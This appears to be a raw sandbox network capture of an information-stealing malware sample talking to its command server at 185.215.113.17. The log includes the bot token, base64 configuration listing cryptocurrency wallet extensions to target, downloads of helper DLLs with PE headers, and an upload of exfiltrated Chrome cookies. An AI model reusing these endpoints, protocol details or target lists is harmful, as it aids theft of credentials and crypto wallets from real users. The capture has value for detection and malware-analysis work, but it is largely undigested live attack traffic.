Aug 26, 2024 23:29:19.892704010 CEST	348	IN	Data Raw: 66 45 39 77 5a 58 4a 68 49 45 64 59 49 46 4e 30 59 57 4a 73 5a 58 78 63 54 33 42 6c 63 6d 45 67 55 32 39 6d 64 48 64 68 63 6d 56 38 62 33 42 6c 63 6d 46 38 62 33 42 6c 63 6d 45 75 5a 58 68 6c 66 45 31 76 65 6d 6c 73 62 47 45 67 52 6d 6c 79 5a 57 Data Ascii: fE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRmlyZWZveHxcTW96aWxsYVxGaXJlZm94XFByb2ZpbGVzfGZpcmVmb3h8MHxQYWxlIE1vb258XE1vb25jaGlsZCBQcm9kdWN0aW9uc1xQYWxlIE1vb25cUHJvZmlsZXN8ZmlyZWZveHwwfE9wZXJhIENyeXB0byBTdGFibGV
Aug 26, 2024 23:29:19.894201994 CEST	468	OUT	POST /2fb6c2cc8dce150a.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KECGDBFCBKFIDHIDHDHI Host: 185.215.113.17 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 45 43 47 44 42 46 43 42 4b 46 49 44 48 49 44 48 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 38 35 39 37 30 36 30 66 33 36 37 62 32 36 37 66 61 61 36 39 64 36 36 66 64 65 36 34 38 63 66 31 36 62 30 65 37 62 63 66 37 34 32 65 34 65 35 64 30 36 32 37 36 62 33 30 64 34 33 66 33 66 62 37 36 62 34 33 37 62 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 43 47 44 42 46 43 42 4b 46 49 44 48 49 44 48 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 43 47 44 42 46 43 42 4b 46 49 44 48 49 44 48 44 48 49 2d 2d 0d 0a Data Ascii: ------KECGDBFCBKFIDHIDHDHIContent-Disposition: form-data; name="token"238597060f367b267faa69d66fde648cf16b0e7bcf742e4e5d06276b30d43f3fb76b437b------KECGDBFCBKFIDHIDHDHIContent-Disposition: form-data; name="message"plugins------KECGDBFCBKFIDHIDHDHI--
Aug 26, 2024 23:29:20.142215967 CEST	1236	IN	HTTP/1.1 200 OK Date: Mon, 26 Aug 2024 21:29:20 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 7116 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
Aug 26, 2024 23:29:20.142266989 CEST	164	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9n
Aug 26, 2024 23:29:20.142303944 CEST	1236	IN	Data Raw: 61 32 64 6a 5a 47 5a 6f 61 47 4a 6b 5a 47 4e 6e 61 47 46 6a 61 47 74 6c 61 6d 56 68 63 48 77 78 66 44 42 38 4d 48 78 54 62 32 78 73 5a 58 52 38 5a 6d 68 74 5a 6d 56 75 5a 47 64 6b 62 32 4e 74 59 32 4a 74 5a 6d 6c 72 5a 47 4e 76 5a 32 39 6d 63 47 Data Ascii: a2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29mcGhpbW5rbm98MXwwfDB8QXVybyBXYWxsZXQoTWluYSBQcm90b2NvbCl8Y25tYW1hYWNocHBua2pnbmlsZHBkbWthYWtlam5oYWV8MXwwfDB8UG9seW1lc2ggV2FsbGV0fGpvamhmZW9lZGtwa2dsYmZpbWRmYWJwZGZ
Aug 26, 2024 23:29:20.142339945 CEST	224	IN	Data Raw: 5a 47 70 6b 62 6d 35 76 61 6d 74 69 5a 32 6c 76 61 57 39 6b 59 6d 6c 6a 66 44 46 38 4d 48 77 77 66 45 4e 35 59 57 35 76 49 46 64 68 62 47 78 6c 64 48 78 6b 61 32 52 6c 5a 47 78 77 5a 32 52 74 62 57 74 72 5a 6d 70 68 59 6d 5a 6d 5a 57 64 68 62 6d Data Ascii: ZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWdhbmllYW1ma2xrbXwxfDB8MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8VGV6Qm94fG1uZmlmZWZrYWpnb2ZrY2prZW1pZGlhZWNvY25ramVofDF8MHwwfFRl
Aug 26, 2024 23:29:20.142369032 CEST	1236	IN	Data Raw: 62 58 42 73 5a 58 78 76 62 32 74 71 62 47 4a 72 61 57 6c 71 61 57 35 6f 63 47 31 75 61 6d 5a 6d 59 32 39 6d 61 6d 39 75 59 6d 5a 69 5a 32 46 76 59 33 77 78 66 44 42 38 4d 48 78 48 62 32 4a 35 66 47 70 75 61 32 56 73 5a 6d 46 75 61 6d 74 6c 59 57 Data Ascii: bXBsZXxvb2tqbGJraWlqaW5ocG1uamZmY29mam9uYmZiZ2FvY3wxfDB8MHxHb2J5fGpua2VsZmFuamtlYWRvbmVjYWJlaGFsbWJncGZvZGptfDF8MHwwfFJvbmluIFdhbGxldHxram1vb2hsZ29rY2NvZGljampmZWJmb21sYmxqZ2Zoa3wxfDB8MHxCeW9uZXxubGdiaGRmZ2RoZ2JpYW1mZGZtYmlrY2RnaGlkb2FkZHwxfDB
Aug 26, 2024 23:29:20.142404079 CEST	1236	IN	Data Raw: 59 57 35 68 5a 32 56 79 66 47 6c 74 62 47 39 70 5a 6d 74 6e 61 6d 46 6e 5a 32 68 75 62 6d 4e 71 61 32 68 6e 5a 32 52 6f 59 57 78 74 59 32 35 6d 61 32 78 72 66 44 46 38 4d 48 77 77 66 45 46 31 64 47 68 6c 62 6e 52 70 59 32 46 30 62 33 4a 38 59 6d Data Ascii: YW5hZ2VyfGltbG9pZmtnamFnZ2hubmNqa2hnZ2RoYWxtY25ma2xrfDF8MHwwfEF1dGhlbnRpY2F0b3J8YmhnaG9hbWFwY2RwYm9ocGhpZ29vb2FkZGlucGtiYWl8MXwwfDB8QXV0aHl8Z2FlZG1qZGZtbWFoaGJqZWZjYmdhb2xoaGFubGFvbGJ8MXwwfDB8RU9TIEF1dGhlbnRpY2F0b3J8b2VsamRsZHBubWRiY2hvbmllbGl
Aug 26, 2024 23:29:20.142438889 CEST	268	IN	Data Raw: 5a 57 56 77 63 47 64 6b 63 47 68 38 4d 58 77 77 66 44 42 38 55 6d 6c 7a 5a 53 41 74 49 45 46 77 64 47 39 7a 49 46 64 68 62 47 78 6c 64 48 78 6f 59 6d 4a 6e 59 6d 56 77 61 47 64 76 61 6d 6c 72 59 57 70 6f 5a 6d 4a 76 62 57 68 73 62 57 31 76 62 47 Data Ascii: ZWVwcGdkcGh8MXwwfDB8UmlzZSAtIEFwdG9zIFdhbGxldHxoYmJnYmVwaGdvamlrYWpoZmJvbWhsbW1vbGxwaGNhZHwxfDB8MHxSYWluYm93IFdhbGxldHxvcGZnZWxtY21iaWFqYW1lcG5tbG9pamJwb2xlaWFtYXwxfDB8MHxOaWdodGx5IFdhbGxldHxmaWlrb21tZGRiZWNjYW9pY29lam9uaWFtbW5hbGtmYXwxfDB8MHx
Aug 26, 2024 23:29:20.142472029 CEST	1236	IN	Data Raw: 61 57 52 6c 61 6d 52 6c 62 57 64 76 62 32 4e 6f 63 47 35 72 62 57 52 71 63 47 39 6a 5a 32 74 6f 59 58 77 78 66 44 42 38 4d 48 78 44 62 32 6c 75 61 48 56 69 66 47 70 6e 59 57 46 70 62 57 46 71 61 58 42 69 63 47 52 76 5a 33 42 6b 5a 32 78 6f 59 58 Data Ascii: aWRlamRlbWdvb2NocG5rbWRqcG9jZ2toYXwxfDB8MHxDb2luaHVifGpnYWFpbWFqaXBicGRvZ3BkZ2xoYXBobGRha2lrZ2VmfDF8MHwwfE11bHRpdmVyc1ggRGVGaSBXYWxsZXR8ZG5nbWxibGNvZGZvYnBkcGVjYWFkZ2ZiY2dnZmpmbm18MXwwfDB8RnJvbnRpZXIgV2FsbGV0fGtwcGZkaWlwcGhmY2NlbWNpZ25oaWZwamt
Aug 26, 2024 23:29:20.142508984 CEST	508	IN	Data Raw: 66 44 42 38 56 47 39 75 61 32 56 6c 63 47 56 79 49 46 64 68 62 47 78 6c 64 48 78 76 62 57 46 68 59 6d 4a 6c 5a 6d 4a 74 61 57 6c 71 5a 57 52 75 5a 33 42 73 5a 6d 70 74 62 6d 39 76 63 48 42 69 59 32 78 72 61 33 77 78 66 44 42 38 4d 48 78 50 63 47 Data Ascii: fDB8VG9ua2VlcGVyIFdhbGxldHxvbWFhYmJlZmJtaWlqZWRuZ3BsZmptbm9vcHBiY2xra3wxfDB8MHxPcGVuTWFzayBXYWxsZXR8cGVuamxkZGpramdwbmtsbGJvY2NkZ2NjZWtwa2NiaW58MXwwfDB8U2FmZVBhbCBXYWxsZXR8YXBlbmtmYmJwbWhpaGVobWlobmRtbWNkYW5hY29sbmh8MXwwfDB8Qml0Z2V0IFdhbGxldHx
Aug 26, 2024 23:29:20.152004957 CEST	469	OUT	POST /2fb6c2cc8dce150a.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HDGIEBGHDAEBGDGCFIID Host: 185.215.113.17 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 44 47 49 45 42 47 48 44 41 45 42 47 44 47 43 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 38 35 39 37 30 36 30 66 33 36 37 62 32 36 37 66 61 61 36 39 64 36 36 66 64 65 36 34 38 63 66 31 36 62 30 65 37 62 63 66 37 34 32 65 34 65 35 64 30 36 32 37 36 62 33 30 64 34 33 66 33 66 62 37 36 62 34 33 37 62 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 49 45 42 47 48 44 41 45 42 47 44 47 43 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 49 45 42 47 48 44 41 45 42 47 44 47 43 46 49 49 44 2d 2d 0d 0a Data Ascii: ------HDGIEBGHDAEBGDGCFIIDContent-Disposition: form-data; name="token"238597060f367b267faa69d66fde648cf16b0e7bcf742e4e5d06276b30d43f3fb76b437b------HDGIEBGHDAEBGDGCFIIDContent-Disposition: form-data; name="message"fplugins------HDGIEBGHDAEBGDGCFIID--
Aug 26, 2024 23:29:20.398123026 CEST	335	IN	HTTP/1.1 200 OK Date: Mon, 26 Aug 2024 21:29:20 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Aug 26, 2024 23:29:20.424444914 CEST	202	OUT	POST /2fb6c2cc8dce150a.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHCAAAAKJJDAKECBGIJE Host: 185.215.113.17 Content-Length: 7295 Connection: Keep-Alive Cache-Control: no-cache
Aug 26, 2024 23:29:20.731913090 CEST	202	IN	HTTP/1.1 200 OK Date: Mon, 26 Aug 2024 21:29:20 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Aug 26, 2024 23:29:20.986605883 CEST	93	OUT	GET /f1ddeb6592c03206/sqlite3.dll HTTP/1.1 Host: 185.215.113.17 Cache-Control: no-cache
Aug 26, 2024 23:29:21.231591940 CEST	1236	IN	HTTP/1.1 200 OK Date: Mon, 26 Aug 2024 21:29:21 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
Aug 26, 2024 23:29:22.737193108 CEST	952	OUT	POST /2fb6c2cc8dce150a.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EGIJEBGDAFHIJJKEHCAA Host: 185.215.113.17 Content-Length: 751 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 47 49 4a 45 42 47 44 41 46 48 49 4a 4a 4b 45 48 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 38 35 39 37 30 36 30 66 33 36 37 62 32 36 37 66 61 61 36 39 64 36 36 66 64 65 36 34 38 63 66 31 36 62 30 65 37 62 63 66 37 34 32 65 34 65 35 64 30 36 32 37 36 62 33 30 64 34 33 66 33 66 62 37 36 62 34 33 37 62 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 4a 45 42 47 44 41 46 48 49 4a 4a 4b 45 48 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 4a 45 42 47 44 41 46 48 49 4a 4a 4b 45 48 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 [TRUNCATED] Data Ascii: ------EGIJEBGDAFHIJJKEHCAAContent-Disposition: form-data; name="token"238597060f367b267faa69d66fde648cf16b0e7bcf742e4e5d06276b30d43f3fb76b437b------EGIJEBGDAFHIJJKEHCAAContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------EGIJEBGDAFHIJJKEHCAAContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwNzY1NDEJMVBfSkFSCTIwMjMtMTAtMDUtMDcKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjk1NzQwCU5JRAk1MTE9bk5hZHFXOXVUY1kwT1A2STNhZm5yNzFvNkV6YVlMc2RwVzRVRVlOM3ZZcV9yYlJyTkZ4TTFqb3pQR3Voak9SQlpLS016MnRkRHBWZTdkTnVUV3A0Q3lLLXp0NUlzNndWRWx2ZVdBZktRZ3dOSmlLS3RYSENDQ21ybGd6WlRsNUNpS2pUZUEyaVFxZjZ6bFJLMmg4d2cxaFZwSXNXc2FLcWFXSnlITVBGM0pBCg==------EGIJEBGDAFHIJJKEHCAA--
Aug 26, 2024 23:29:23.034679890 CEST	202	IN	HTTP/1.1 200 OK Date: Mon, 26 Aug 2024 21:29:22 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Aug 26, 2024 23:29:23.290585041 CEST	564	OUT	POST /2fb6c2cc8dce150a.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCFHJKJJJECGDHJJDHDA Host: 185.215.113.17 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 43 46 48 4a 4b 4a 4a 4a 45 43 47 44 48 4a 4a 44 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 38 35 39 37 30 36 30 66 33 36 37 62 32 36 37 66 61 61 36 39 64 36 36 66 64 65 36 34 38 63 66 31 36 62 30 65 37 62 63 66 37 34 32 65 34 65 35 64 30 36 32 37 36 62 33 30 64 34 33 66 33 66 62 37 36 62 34 33 37 62 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 48 4a 4b 4a 4a 4a 45 43 47 44 48 4a 4a 44 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 48 4a 4b 4a 4a 4a 45 43 47 44 48 4a 4a 44 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------FCFHJKJJJECGDHJJDHDAContent-Disposition: form-data; name="token"238597060f367b267faa69d66fde648cf16b0e7bcf742e4e5d06276b30d43f3fb76b437b------FCFHJKJJJECGDHJJDHDAContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------FCFHJKJJJECGDHJJDHDAContent-Disposition: form-data; name="file"------FCFHJKJJJECGDHJJDHDA--
Aug 26, 2024 23:29:23.581393003 CEST	202	IN	HTTP/1.1 200 OK Date: Mon, 26 Aug 2024 21:29:23 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Aug 26, 2024 23:29:24.956075907 CEST	564	OUT	POST /2fb6c2cc8dce150a.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AFBKKFBAEGDHJJJJKFBK Host: 185.215.113.17 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 46 42 4b 4b 46 42 41 45 47 44 48 4a 4a 4a 4a 4b 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 38 35 39 37 30 36 30 66 33 36 37 62 32 36 37 66 61 61 36 39 64 36 36 66 64 65 36 34 38 63 66 31 36 62 30 65 37 62 63 66 37 34 32 65 34 65 35 64 30 36 32 37 36 62 33 30 64 34 33 66 33 66 62 37 36 62 34 33 37 62 0d 0a 2d 2d 2d 2d 2d 2d 41 46 42 4b 4b 46 42 41 45 47 44 48 4a 4a 4a 4a 4b 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 46 42 4b 4b 46 42 41 45 47 44 48 4a 4a 4a 4a 4b 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------AFBKKFBAEGDHJJJJKFBKContent-Disposition: form-data; name="token"238597060f367b267faa69d66fde648cf16b0e7bcf742e4e5d06276b30d43f3fb76b437b------AFBKKFBAEGDHJJJJKFBKContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------AFBKKFBAEGDHJJJJKFBKContent-Disposition: form-data; name="file"------AFBKKFBAEGDHJJJJKFBK--
Aug 26, 2024 23:29:25.246627092 CEST	202	IN	HTTP/1.1 200 OK Date: Mon, 26 Aug 2024 21:29:25 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Aug 26, 2024 23:29:25.848736048 CEST	93	OUT	GET /f1ddeb6592c03206/freebl3.dll HTTP/1.1 Host: 185.215.113.17 Cache-Control: no-cache
Aug 26, 2024 23:29:26.092571020 CEST	1236	IN	HTTP/1.1 200 OK Date: Mon, 26 Aug 2024 21:29:25 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "a7550-5e7e950876500" Accept-Ranges: bytes Content-Length: 685392 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 